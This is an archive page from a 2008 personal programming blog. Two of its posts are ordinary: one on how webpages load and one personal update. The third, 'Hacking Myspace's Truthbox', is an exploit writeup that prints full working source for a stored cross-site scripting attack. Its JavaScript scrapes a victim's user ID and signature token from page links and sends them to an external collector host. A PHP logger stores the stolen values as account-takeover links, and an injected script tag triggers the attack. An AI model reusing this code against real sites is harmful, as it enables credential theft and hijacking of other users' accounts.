Joey Adams Dot Net

Southern Fried Programming

Archive for October, 2008


What REALLY happens when you view a webpage

Published October 21st, 2008 in Electronics, Uncategorized | 3 Comments »

This post is something I thought of while listening to people talk and gripe about how long it takes to view websites and to surf the internet. The majority of people do not understand the inner working of computer systems at very low levels, even I have a threshold of knowledge that I have to stop at, but I think it would be an interesting read for someone who wants to know what exactly happens when they hit ‘GO’ in there favorite browser (hopefully Firefox ;) ).

INTRO:

To start things off, lets talk about what the internet consists of. Most everyone knows what a Browser is, they have heard of “Servers” before, and have seen a Modem or Router. Well these objects provide the basis for connectivity, after all , the internet is nothing more than a great big network of computers. (more…)

Hacking Myspace’s Truthbox

Published October 15th, 2008 in Uncategorized | No Comments »

I developed exploit code for Truthbox months ago, and am now releasing a writeup.

Myspace applications are stand-alone web applications hosted on arbitrary servers that use Myspace’s API to communicate user information between its own programming logic. The details of authorization and authentication of using the api I have not explored, but I imagine it is similiar to PayPal’s API with a series of requests and responses using trasactional id’s and pre-shared authentication keys. Hopefully also using referrer information to determine if the packets were sent from a legit source. Even with these securities, these mechanisms are always flawed.

Back to the subject, I first discovered that you can enter scripting in almost any form into truthbox replies. Now you cannot do this with the initial comment itself, but with replies you can enter markup and script without being filtered, in other words, XSS (cross-site scripting).

The next part was finding an association on the client side with your myspace identity. As it turns out, and in particular being part of an even bigger hole, your friend id is stored in links all over the place inside a GET variable called ‘fb_sig_user’. More on why later.

So we create a script that will parse the page and pick out this friend ID from the links on the page. Not all links on the page contain this variable, so you have to make your script work a little bit harder. After we extract the friend ID , we can store it and view it later, plugging it into a myspace url, giving you the identity of whoever left you a comment. 1 Problem, replies are limited on characters, but all you have to do is store your script somewhere on the web, and in your reply, call an external script.

Now why does it store your friend id, anyway? Well, for identification. Since you are not operating on myspace’s servers, yet in an iframe pointing to a arbitrary script, it is exactly like visiting an entirely different website. The seamless communication happens on the backend between myspace and this app-server. So supplying your friend ID in the URL of web requests, you are telling ‘TruthBox’ who you are. So what if we change our friend id to someone elses?

Well, as I found out by plugging in variable by variable, there is a check that truthbox does to make sure you are ‘you’. There is a value, or a signature, associated with your truthbox account. If you have their friend ID, and their signature, you simply plug these into the URL and you can take control of their Truthbox account. Luckily, the signature is also stored in client side URL values as ‘fb_sig’. So we mess with our script to pull this value out along with the friend ID and we should be good to go.

Here is, in lamens, how it works.

Someone leaves you a nasty, or exciting :) comment. You reply to their comment with an external script. In my script, I added a function to include a comment to seperate different truth box comments from each other. Whenever they view your reply, the script runs and extracts their friend ID and truthbox signature, and stores this to view later, along with the comment in my script.

You view the results, and can click a link to view their myspace profile. Another link, when clicked, allows you to take control and look through their truthbox profile, seeing who all they have commented, and who has commented them.

This was simple fun to mess with the unknown, and nothing more, with this research, I more than satisfied what I wanted to accompolish, and beyond the 2 days I was messing with it, I have not looked at the source in truthbox pages since.

Below is some of my source code of the scripts I used.

The external script. (a.js)

function strpos( haystack, needle, offset){
    var i = (haystack+'').indexOf( needle, offset );
    return i===-1 ? false : i;
}
function gets( str){
        var f = strpos(str,'fb_sig%3D') + 9;
        return str.substr(f);
}
function getf( str){
        var f = strpos(str,'fb_sig_user') + 14;
        var s = strpos(str,'%26',f);
        var l = s - f;
        return str.substr(f,l);
}
function a(comment){
var i = 0;
var f = 0;
while(f != 1){
        if (document.links[i].href.search('fb_sig_user') > 0){
window.location = "http://xxxx/cook.php?c=" + comment + "&u=" + getf(document.links[i].href) + "&s=" + gets(document.links[i].href);
                f = 1;
        } else {
                i++;
        }
}
}

cook.php

<?php

@$u = $_GET['u'];
@$s = $_GET['s'];

$dir = 'results';

$h = fopen("./{$dir}/results.html",'a+');
$text = '';
if(isset($_GET['c'])){
        $text .= "Comment= {$_GET['c']} - ";
}
if(isset($_GET['s'])){
        $text .= "<a href='http://opensocial.rockyou.com/google_apps/truthbox/truthbox/html/index.php?target=home&fb_sig_user={$u}&fb_sig_network=myspace&fb_sig={$s}'>See Their Truths</a> -";

}
$text .= "Profile: <a href='http://profile.myspace.com/index.cfm?fuseaction=user.viewprofile&friendid={$u}'>View Profile</a><hr/>";
fwrite($h,$text);
fclose($h);

?>

The reply used to trigger the attack.

<script type='text/javascript' src='http://xxxx/a.js'></script>
<script>a('Comment Here');</script>

Lack of.. Posting

Published October 10th, 2008 in Uncategorized | No Comments »

I have not posted in a good while because I have been too busy with things. With the economic meltdown, my day job is now doubled. I work at a local FOX affiliate, but I also contract IT work for them as well. Do to the current hiring freeze I can’t be promoted (not sure I would be in the first place), and to top all that off I also work with Heritage Web Solutions as an outsourced dev.

Between it all I make some good money but do not get a lot of free time, and the time I get is consumed with my son and my many hobbies.

What I want to accompolish before the new year is the Zend Framework Cert, and then complete the MYSQL exam in the first quarter of next year. That should satisfy myself for now.

There have been a great deal of happenings in the security world, the newest being the ever elusive clickjacking. I’ve been keeping up with it by constanting RSnake’s blog over at http://ha.ckers.org  .  If you have not heard of it, then you MUST visit his blog to read more, I won’t even disrespect the subject by regurgitating what he said, you must read it for yourself.